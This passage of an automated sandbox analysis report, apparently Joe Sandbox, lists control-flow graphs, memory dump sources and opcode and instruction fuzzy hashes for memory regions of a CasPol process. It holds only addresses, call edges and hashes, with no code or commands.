          control_flow_graph 1018 11904a0-11904cd 1020 1190590-11905d5 1018->1020 1021 11904d3-11904f1 1018->1021 1024 11905db-11905e0 1020->1024 1025 119088a-1190891 1020->1025 1026 119058b-119058f 1021->1026 1027 11904f7-11904fa 1021->1027 1660 11905e3 call 10f05df 1024->1660 1661 11905e3 call 10f0606 1024->1661 1028 1190893-11908f1 call 11904b0 1025->1028 1029 11908f6-11908fd 1025->1029 1027->1020 1030 1190500-1190528 1027->1030 1028->1029 1032 11908ff-1190912 call 11904b0 1029->1032 1033 1190917-119091e 1029->1033 1069 1190530-119053e 1030->1069 1031 11905e9-11905ed 1034 11905f3-11905f6 1031->1034 1035 1190776-119077a 1031->1035 1032->1033 1040 11905fc-1190604 1034->1040 1041 119091f-1190959 1034->1041 1038 1190881-1190884 1035->1038 1039 1190780-1190796 1035->1039 1038->1024 1038->1025 1061 1190798 1039->1061 1062 119079d-11907d2 1039->1062 1043 1190659-1190665 1040->1043 1044 1190606-119060a 1040->1044 1051 119095f-1192dfb 1041->1051 1052 1192e06-1192e11 1041->1052 1043->1041 1057 119066b-1190681 1043->1057 1044->1041 1049 1190610-1190615 1044->1049 1049->1043 1055 1190617-1190652 1049->1055 1051->1052 1055->1043 1070 1190761-1190770 1057->1070 1071 1190687-1190693 1057->1071 1061->1062 1089 1190809-119081e 1062->1089 1090 11907d4-11907f4 1062->1090 1073 1190581-1190585 1069->1073 1074 1190540-1190547 1069->1074 1070->1034 1070->1035 1082 11906b0-11906c5 1071->1082 1083 1190695-119075f 1071->1083 1073->1026 1073->1027 1074->1073 1080 1190549-119057b 1074->1080 1080->1073 1099 119074b-1190750 1082->1099 1100 11906cb-11906d6 1082->1100 1083->1035 1105 1190820-119082b 1089->1105 1106 1190877-119087c 1089->1106 1662 11907f6 call 10f05df 1090->1662 1663 11907f6 call 10f0606 1090->1663 1099->1033 1112 11906e9-11906fc 1100->1112 1113 11906d8-11906e7 1100->1113 1118 119082d-119083c 1105->1118 1119 119083e-1190851 1105->1119 1106->1033 1111 11907fc-1190801 call 1192e28 1120 1190807 1111->1120 1124 11906fe-1190743 1112->1124 1113->1112 1113->1124 1118->1119 1130 1190853-119086f 1118->1130 1119->1130 1120->1038 1124->1099 1130->1106 1660->1031 1661->1031 1662->1111 1663->1111
          Memory Dump Source
          • Source File: 00000008.00000002.24005129500.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_1190000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 0e8df5d9cdc6a2c58954f775800ea16432887901aefefa00c2729cb512eb6648
          • Instruction ID: ae38c68ebbad6b8e4147e4fba96d19dd556c95bc3717c70d8b8b60c921bceb42
          • Opcode Fuzzy Hash: 0e8df5d9cdc6a2c58954f775800ea16432887901aefefa00c2729cb512eb6648
          • Instruction Fuzzy Hash: 3221F430601214CFDB199B78E4487197BE5AF8E318F1589BAD919DF366DB31CC86CB82

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1664 11903f8-1190422 1666 1190428 1664->1666 1667 1190424-1190426 1664->1667 1668 119042b-1190443 1666->1668 1667->1668 1670 1190448-119049b 1668->1670
          Memory Dump Source
          • Source File: 00000008.00000002.24005129500.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_1190000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6ddaafbc64c6530a670b4eb711ed471b08aaa4fba181119fe6b872deb0ae80be
          • Instruction ID: d4fb7bb965701767ff31062ed8edc4c7f0786b163b1f7cba7537caf71b331dfe
          • Opcode Fuzzy Hash: 6ddaafbc64c6530a670b4eb711ed471b08aaa4fba181119fe6b872deb0ae80be
          • Instruction Fuzzy Hash: 631102353051908FC309EB39F454E2E7BE2AB8D208724466DEA06CB396CB20CC86C793

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1682 1190221-119024c 1683 1190254 1682->1683 1697 119024e call 11902a9 1682->1697 1698 119024e call ef23f4 1682->1698 1699 1190254 call 10f05df 1683->1699 1700 1190254 call 11903f8 1683->1700 1701 1190254 call 10f0606 1683->1701 1684 119025a 1702 119025c call 11904b0 1684->1702 1703 119025c call 11904a0 1684->1703 1685 1190262-1190266 1686 1190268-119028f 1685->1686 1687 1190291 1685->1687 1690 11902a0-11902a7 1686->1690 1693 1190293 call 10f05df 1687->1693 1694 1190293 call 11904b0 1687->1694 1695 1190293 call 11904a0 1687->1695 1696 1190293 call 10f0606 1687->1696 1689 1190299 1689->1690 1693->1689 1694->1689 1695->1689 1696->1689 1697->1683 1698->1683 1699->1684 1700->1684 1701->1684 1702->1685 1703->1685
          Memory Dump Source
          • Source File: 00000008.00000002.24005129500.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_1190000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 31f724d2eab4f277bb9b390b02be23abed73be8f9eeadca5da44e906a618d2be
          • Instruction ID: ecb81c4e4812847c25a96f5fff924e70514e56fa5612a98dc126a04330a20067
          • Opcode Fuzzy Hash: 31f724d2eab4f277bb9b390b02be23abed73be8f9eeadca5da44e906a618d2be
          • Instruction Fuzzy Hash: 5901A7719011189FCB58DFB5EC496AFBFB9FB48311B10866EE41AD3250DB318A45CB50

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1679 10f05df-10f0620 1681 10f0626-10f0643 1679->1681
          Memory Dump Source
          • Source File: 00000008.00000002.24005018479.00000000010F0000.00000040.00000020.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_10f0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 1b3badbac4d8f2d2e667ea0b7e31e02f5b3b933520fb7266ad422b2831e119e4
          • Instruction ID: 8f909e376b5326e754a1201d165fd20fd3991b7df37d5490efb0119eb577247c
          • Opcode Fuzzy Hash: 1b3badbac4d8f2d2e667ea0b7e31e02f5b3b933520fb7266ad422b2831e119e4
          • Instruction Fuzzy Hash: A701DB755093445FD701CF159C44862FFF8EF8522070980AFFC498B612D235B804CB75

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1704 1190230-119024c 1719 119024e call 11902a9 1704->1719 1720 119024e call ef23f4 1704->1720 1705 1190254 1721 1190254 call 10f05df 1705->1721 1722 1190254 call 11903f8 1705->1722 1723 1190254 call 10f0606 1705->1723 1706 119025a 1724 119025c call 11904b0 1706->1724 1725 119025c call 11904a0 1706->1725 1707 1190262-1190266 1708 1190268-119028f 1707->1708 1709 1190291 1707->1709 1712 11902a0-11902a7 1708->1712 1715 1190293 call 10f05df 1709->1715 1716 1190293 call 11904b0 1709->1716 1717 1190293 call 11904a0 1709->1717 1718 1190293 call 10f0606 1709->1718 1711 1190299 1711->1712 1715->1711 1716->1711 1717->1711 1718->1711 1719->1705 1720->1705 1721->1706 1722->1706 1723->1706 1724->1707 1725->1707
          Memory Dump Source
          • Source File: 00000008.00000002.24005129500.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_1190000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 62a8c08a002f1aa4ddd953172d79acc7fdb29feaee5f6428d1a0f22f24883649
          • Instruction ID: 8c166393874bc70c5bb0ca5a3c00d8cbb260e3fa5b9b88ebfeaf8629bc768a12
          • Opcode Fuzzy Hash: 62a8c08a002f1aa4ddd953172d79acc7fdb29feaee5f6428d1a0f22f24883649
          • Instruction Fuzzy Hash: D5016271A012189FCF58EFB9EC4856EBBBDFB48311B108569E516D3290DB348A41CB91

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1726 10f0606-10f0620 1727 10f0626-10f0643 1726->1727
          Memory Dump Source
          • Source File: 00000008.00000002.24005018479.00000000010F0000.00000040.00000020.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_10f0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 819f20cf312094f06ad98701b9005cdc1374ddfbfbb93c2edca5970f2fef3273
          • Instruction ID: 5f8289ced11546566a9a72b0853fa6214c4e6e0d6d0af37417498ee490e7b2aa
          • Opcode Fuzzy Hash: 819f20cf312094f06ad98701b9005cdc1374ddfbfbb93c2edca5970f2fef3273
          • Instruction Fuzzy Hash: DFE092BA6006048B9650CF0AEC41462F7D8EB84730B08C07FDC0D8B711D236B505CAE5

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1728 ef23f4-ef23ff 1729 ef2412-ef2417 1728->1729 1730 ef2401-ef240e 1728->1730 1731 ef241a 1729->1731 1732 ef2419 1729->1732 1730->1729 1733 ef2420-ef2421 1731->1733
          Memory Dump Source
          • Source File: 00000008.00000002.24004532298.0000000000EF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF2000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_ef2000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6f6b99894447693081c3957ad75ae48ed1808f8db7bcf217beeb19127edac327
          • Instruction ID: f62b1816a79a5dad61c6f04a57e58339e4fab93847537d4730110aaf09714ddc
          • Opcode Fuzzy Hash: 6f6b99894447693081c3957ad75ae48ed1808f8db7bcf217beeb19127edac327
          • Instruction Fuzzy Hash: 7BD05E792096814FD3179A1CC1A4BA537D4AB51B18F4A44FEA9408B763C7A8D981E610
          Memory Dump Source
          • Source File: 00000008.00000002.24004532298.0000000000EF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF2000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_ef2000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 51e77bd3265b01c9b47fdb38e3f6a110b83a04ed83acb031fe17b4c39caaf5ae
          • Instruction ID: 4e5eb0755bd6c8ee5d944da2b62eeede088ee9b080b162e7df88c91101102912
          • Opcode Fuzzy Hash: 51e77bd3265b01c9b47fdb38e3f6a110b83a04ed83acb031fe17b4c39caaf5ae
          • Instruction Fuzzy Hash: 79D05E742016864BC719EE0CC6E4F6933D4AB50B18F0644EDAD508B662C7A8D8C0CA00